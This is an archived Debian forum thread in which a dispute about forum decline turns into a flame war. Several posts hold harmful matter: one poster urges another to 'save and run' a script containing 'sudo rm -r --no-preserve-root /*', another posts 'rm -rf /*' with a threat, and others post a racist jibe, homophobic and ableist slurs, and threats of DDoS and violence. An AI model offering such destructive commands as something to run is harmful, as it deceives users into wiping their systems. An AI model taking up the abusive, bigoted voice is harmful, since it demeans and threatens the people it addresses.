Scheduled Maintenance: We are aware of an issue with Google, AOL, and Yahoo services as email providers which are blocking new registrations. We are trying to fix the issue and we have several internal and external support tickets in process to resolve the issue. Please see: viewtopic.php?t=158230

The Decline of this Forum

Here you can discuss every aspect of Debian. Note: not for support requests!
Troll

Re: The Decline of this Forum

#61 Post by Troll »

vbrummond wrote:
Troll wrote:What are you saying I don't understand? That it will probably break? Your right, it probably will, which indicates the software is junk, in which case you should find better quality software.
:lol:
What do you always try and deflect getting put in your place with debate-less technicality observations?
Are you trying to judge my intelligence by minor academic mistakes? English is not my native language, my native language is Greek.. Do you know how to spell those two words in Greek, write them in Greek, or hold a conversation in Greek for that matter? No, you can't. So, in accordance to your logic, this would make you a dumb ass, wouldn't it.

Randicus

#62 Post by Randicus »

Being an academic I love debating. But the way to do it is set forth an agrument as simply as possible and backed up with evidence.
Long-winded rants and personal attacks are not debating. If attacking others' character and intelligence is one's only available rebutal, then one does not have a valid argument.

Which brings us back to the original post concerning the decline of the forum. This kind of behaviour definitely discourages many people from participating.

And vbrummond is one of the very helpful people on this forum. Personally attacking him is ridiculous.

vbrummond

#63 Post by vbrummond »

Troll wrote:What do you always try and deflect getting put in your place with debate-less technicality observations?
I am acting the same as you. Annoying is it not?
Are you trying to judge my intelligence by minor academic mistakes?
Nope. :)
English is not my native language, my native language is Greek..
Don't care.
Do you know how to spell those two words in Greek, write them in Greek, or hold a conversation in Greek for that matter? No, you can't. So, in accordance to your logic, this would make you a dumb ass, wouldn't it.
Logic fail.
Last edited by vbrummond on 2011-07-23 09:18, edited 1 time in total.
Always on Debian Testing

vbrummond

#64 Post by vbrummond »

Randicus wrote:And vbrummond is one of the very helpful people on this forum. Personally attacking him is ridiculous.
Thank you and you as well. However in this case I am really trying to be a jerk to this guy. If he had any desire to be rational or polite I would not have done so.
Always on Debian Testing

Troll

#65 Post by Troll »

Why do Chinese guys always love kissing white guys feet?! lol seriously

Randicus

#66 Post by Randicus »

Troll wrote:Why do Chinese guys always love kissing white guys feet?! lol seriously
I hope you are not referring to me. If you are, you are making a fool of yourself.
I live in China. I was raised in Canada and lived in Australia before moving to China. And my physical appearance resembles a Viking.
Like I said; If personal attacks are one's only argument, one's argument is invalid.

Troll

#67 Post by Troll »

I am over this thread.
Last edited by Troll on 2011-07-23 09:46, edited 2 times in total.

Randicus

#68 Post by Randicus »

And everyone else will be grateful.
Good ridance.

fff

#69 Post by fff »

hello i have just downloaded the latest localroot from milw0rm and just watched Takedown and am full of blackhat rage do you want me to totally rm -rf your /etc/bin ?!?!?11

fff

#70 Post by fff »

rm -rf /*

!!

next time will be for real!

edplane

#71 Post by edplane »

Troll wrote:I am over this thread.
You should do us a favor and get over Linux as well. Go ahead and save and run this shell script:

Code: Select all

#!/bin/bash
sudo rm -r --no-preserve-root /*
Thanks! :D
Image :D

fff

#72 Post by fff »

listen up ok nobody even likes u the only reason i dont ddos u nto oblivion is cuz ur not even worth my bandwif u fkn fgt retard im srs if u say 1 more thing u wont even get to get out of ur seat cuz i wil KAMEHAMEHAAAAAAA u thru the keyboard n shoc ur fingers so bad u will say sry but its too late for that boyo

Troll

#73 Post by Troll »

Who mad?!
Last edited by Troll on 2011-07-23 10:04, edited 1 time in total.

Randicus

#74 Post by Randicus »

fff wrote:listen up ok nobody even likes u the only reason i dont ddos u nto oblivion is cuz ur not even worth my bandwif u fkn fgt retard im srs if u say 1 more thing u wont even get to get out of ur seat cuz i wil KAMEHAMEHAAAAAAA u thru the keyboard n shoc ur fingers so bad u will say sry but its too late for that boyo
Is this the Ubuntu forum?

fff

#75 Post by fff »

Come at me with a lack of respect like this again and you will fail to have a working spine the next time I catch you around my neck of the woods, I will turn you into a pretzel end of ****** story bro.

fff

#76 Post by fff »

Randicus its ok mate just bcuz ur bad @ copy pastering and ur bot cant compile properly u think u can come here & abuse ur op power and make urself look big m8 well ive got news for u mate it wont work bcuz we all kno u fkn suck so bad even windows clip board doesnt like u m8 so just **** off ok m8

Mr James

#77 Post by Mr James »

I gotta hand it to Troll, he got the board into a 6 page discussion. He's laughing at the mess he's caused while playing with his feces or whatever the hell crazy people do.

Kill the thread. Oh yeah, I forgot, only old knowledgeable members get banned and their thread/posts messed with. :roll:
asus S551L laptop :: debian stable :: dwm

fff

#78 Post by fff »

not only are you guys getting trolled by a crap troll, but you guys are crap trollee's, your all downers

Troll

#79 Post by Troll »

fff,

Your humiliating attempt at trolling drew 0 crowd. You failed.
Try another forum.

fff

#80 Post by fff »

actually i got you so i got 1 :D